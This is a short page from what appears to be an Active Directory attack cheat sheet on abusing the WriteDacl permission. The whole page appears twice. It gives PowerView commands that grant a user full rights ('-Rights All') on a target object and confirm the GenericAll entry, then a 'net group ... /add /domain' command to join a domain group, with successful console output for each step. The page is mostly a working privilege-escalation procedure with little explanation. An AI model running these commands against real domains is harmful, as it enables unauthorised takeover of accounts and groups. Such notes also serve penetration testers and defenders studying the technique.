WriteDacl

You can add new ACLs

PS C:\\Users> Add-DomainObjectAcl  -PrincipalIdentity "morph3" -TargetIdentity "TARGETOBJECT" -Rights All
Add-DomainObjectAcl  -PrincipalIdentity "morph3" -TargetIdentity "TARGETOBJECT" -Rights All

PS C:\\Users> Get-ObjectAcl -Identity "TARGETOBJECT" -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\\$env:Username")) {$_}}
Get-ObjectAcl -Identity "TARGETOBJECT" -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\\$env:Username")) {$_}}

...

AceType               : AccessAllowed
ObjectDN              : <target-objcet>
ActiveDirectoryRights : GenericAll
OpaqueLength          : 0
...
AceFlags              : None
AceQualifier          : AccessAllowed
Identity              : ECORP\\morph3

^ we added the ACL

PS C:\\Users> net group "morph3" TARGETOBJECT /add /domain
net group "morph3" TARGETOBJECT /add /domain
The request will be processed at a domain controller for domain ECORP.LOCAL.

The command completed successfully.

PreviousReadLAPSPassword NextGenericWrite

Last updated 2 years ago

WriteDacl

You can add new ACLs

PS C:\\Users> Add-DomainObjectAcl  -PrincipalIdentity "morph3" -TargetIdentity "TARGETOBJECT" -Rights All
Add-DomainObjectAcl  -PrincipalIdentity "morph3" -TargetIdentity "TARGETOBJECT" -Rights All

PS C:\\Users> Get-ObjectAcl -Identity "TARGETOBJECT" -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\\$env:Username")) {$_}}
Get-ObjectAcl -Identity "TARGETOBJECT" -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\\$env:Username")) {$_}}

...

AceType               : AccessAllowed
ObjectDN              : <target-objcet>
ActiveDirectoryRights : GenericAll
OpaqueLength          : 0
...
AceFlags              : None
AceQualifier          : AccessAllowed
Identity              : ECORP\\morph3

^ we added the ACL

PS C:\\Users> net group "morph3" TARGETOBJECT /add /domain
net group "morph3" TARGETOBJECT /add /domain
The request will be processed at a domain controller for domain ECORP.LOCAL.

The command completed successfully.

PreviousReadLAPSPassword NextGenericWrite

Last updated 2 years ago